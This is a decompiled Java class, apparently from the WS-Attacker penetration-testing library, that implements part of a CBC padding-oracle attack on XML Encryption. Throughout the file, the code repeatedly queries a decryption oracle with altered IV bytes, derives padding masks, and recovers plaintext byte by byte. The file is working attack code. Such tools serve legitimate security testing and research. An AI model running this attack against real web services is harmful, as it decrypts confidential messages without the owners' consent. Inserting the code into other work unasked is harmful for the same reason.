/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc;

import java.util.Arrays;
import java.util.Iterator;
import java.util.LinkedList;
import org.apache.log4j.Logger;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindByteMethod;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindIVMethodProperties;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.Method;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.NoColumnFoundException;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.CBCOracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;

@Deprecated
public class FindIVMethod
extends Method {
    Logger LOG = Logger.getLogger(FindIVMethod.class);
    private final int blockSize;
    private final boolean processingLastBlock;
    private final FindIVMethodProperties properties;
    private final LinkedList<Integer> paddingByteMasks;
    private final LinkedList<Integer> firstPaddingBytes;
    private final LinkedList<Integer> secondPaddingBytes;

    public FindIVMethod(AOracle oracle, byte[] iv, byte[] c1, boolean processingLastBlock) {
        super(oracle, iv, c1);
        this.blockSize = iv.length;
        this.processingLastBlock = processingLastBlock;
        this.properties = new FindIVMethodProperties(this.blockSize);
        this.paddingByteMasks = new LinkedList();
        this.firstPaddingBytes = new LinkedList();
        this.secondPaddingBytes = new LinkedList();
    }

    @Override
    public byte[] executeAttack() {
        this.LOG.info((Object)"FindIV method started");
        byte lastIvByte = this.iv[this.blockSize - 1];
        this.findPaddingMasks();
        while (this.executePaddingAttack(lastIvByte)) {
        }
        if (this.processingLastBlock) {
            this.iv[this.blockSize - 1] = lastIvByte;
        } else {
            this.decryptLastByte(lastIvByte);
        }
        byte decryptedLastByte = this.properties.getByte(this.blockSize - 1);
        FindByteMethod findByteMethod = new FindByteMethod(this.m_Oracle, this.iv, this.c1);
        int notPaddedBytes = this.blockSize;
        if (this.processingLastBlock) {
            notPaddedBytes -= decryptedLastByte;
        }
        this.LOG.info((Object)"FindByte method initialized");
        for (int i = 0; i < notPaddedBytes; ++i) {
            try {
                if (this.properties.isByteDecrypted(i)) continue;
                this.LOG.info((Object)("attack on byte: " + i));
                byte b = findByteMethod.executeAttack(i);
                this.properties.setByte(i, b);
                this.LOG.info((Object)("\tresult " + b));
                continue;
            }
            catch (NoColumnFoundException ncfe) {
                this.LOG.warn((Object)("Byte " + i + " could not be decrypted. Is the file using" + "a different character set or includes strange special" + " characters?"));
                this.LOG.debug((Object)"debug ", (Throwable)ncfe);
            }
        }
        byte[] decrypted = Arrays.copyOf(this.properties.getDecryptedBytes(), notPaddedBytes);
        return decrypted;
    }

    private void decryptLastByte(byte lastIvByte) {
        int largestPadding = this.firstPaddingBytes.size() == 1 ? this.firstPaddingBytes.get(0).intValue() : this.secondPaddingBytes.get(0).intValue();
        this.LOG.debug((Object)("first padding bytes: " + this.firstPaddingBytes.toString()));
        this.LOG.debug((Object)("second padding bytes: " + this.secondPaddingBytes.toString()));
        if (!this.processingLastBlock) {
            this.iv[this.blockSize - 1] = (byte)(0x11 ^ largestPadding);
        }
        byte decryptedLastByte = (byte)(lastIvByte ^ (0x10 ^ largestPadding));
        this.properties.setByte(this.blockSize - 1, decryptedLastByte);
    }

    private void findPaddingMasks() {
        if (this.processingLastBlock) {
            int pm = (this.iv[this.blockSize - 1] & 0xF0) >> 4;
            this.paddingByteMasks.add(pm);
            this.paddingByteMasks.add(pm ^ 1);
        } else {
            int highestBit = this.iv[this.blockSize - 1] & 0x80;
            highestBit >>= 4;
            for (int j = 0; j < 16; ++j) {
                for (int i = 0 + highestBit; i < 8 + highestBit; ++i) {
                    int b = i * 16 + j;
                    this.iv[this.blockSize - 1] = (byte)b;
                    CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
                    OracleResponse resp = this.m_Oracle.queryOracle(req);
                    if (resp.getResult() != OracleResponse.Result.VALID) continue;
                    this.paddingByteMasks.add(i);
                    this.firstPaddingBytes.add(b);
                    this.paddingByteMasks.add(i ^ 1);
                    this.LOG.info((Object)("padding bytes masks found: " + this.paddingByteMasks.toString()));
                    return;
                }
            }
        }
    }

    private boolean executePaddingAttack(byte lastIvByte) {
        int correctResponsesNeeded;
        Iterator i$ = this.paddingByteMasks.iterator();
        while (i$.hasNext()) {
            int i = (Integer)i$.next();
            if (!this.handlePaddingMask(i)) continue;
            for (int j = 0; j < 16; ++j) {
                int b = i * 16 + j;
                if (this.firstPaddingBytes.contains(b) || this.secondPaddingBytes.contains(b)) continue;
                this.iv[this.blockSize - 1] = (byte)b;
                CBCOracleRequest req = new CBCOracleRequest(this.iv, this.c1);
                OracleResponse resp = this.m_Oracle.queryOracle(req);
                if (resp.getResult() != OracleResponse.Result.VALID) continue;
                this.LOG.info((Object)("no error for byte mask: " + Integer.toHexString(i) + " - adding " + b + " to padding bytes"));
                if (!this.paddingByteMasks.contains(i)) {
                    this.paddingByteMasks.add(i);
                }
                if (this.paddingByteMasks.get(0) == i) {
                    this.firstPaddingBytes.add(b);
                    continue;
                }
                this.secondPaddingBytes.add(b);
            }
        }
        int correctResponses = this.firstPaddingBytes.size() + this.secondPaddingBytes.size();
        if (this.processingLastBlock) {
            if (!this.properties.isByteDecrypted(this.blockSize - 1)) {
                this.decryptLastByte(lastIvByte);
            }
            correctResponsesNeeded = this.blockSize - this.properties.getByte(this.blockSize - 1);
            this.LOG.info((Object)("Padding in the last block is " + this.properties.getByte(this.blockSize - 1) + ", so we need " + correctResponsesNeeded + " correct responses"));
        } else {
            correctResponsesNeeded = this.blockSize;
        }
        if (correctResponses >= correctResponsesNeeded) {
            return false;
        }
        int leftBracketPosition = correctResponses - 1;
        this.iv[leftBracketPosition] = (byte)(this.iv[leftBracketPosition] ^ 1);
        this.properties.setByte(leftBracketPosition, (byte)60);
        this.LOG.info((Object)("setting byte " + leftBracketPosition + " to '<' as we got " + correctResponses + " correct responses in this round"));
        return true;
    }

    private boolean handlePaddingMask(int mask) {
        if (this.paddingByteMasks.size() != 2) {
            return true;
        }
        if (this.paddingByteMasks.contains(mask)) {
            if (this.firstPaddingBytes.size() <= 1 && this.secondPaddingBytes.size() <= 1) {
                return true;
            }
            if (this.paddingByteMasks.get(0) == mask && (this.firstPaddingBytes.size() > 1 || this.firstPaddingBytes.size() == 0)) {
                return true;
            }
            if (this.paddingByteMasks.get(1) == mask && this.secondPaddingBytes.size() > 1 || this.secondPaddingBytes.size() == 0) {
                return true;
            }
        }
        return false;
    }

    public FindIVMethodProperties getProperties() {
        return this.properties;
    }
}

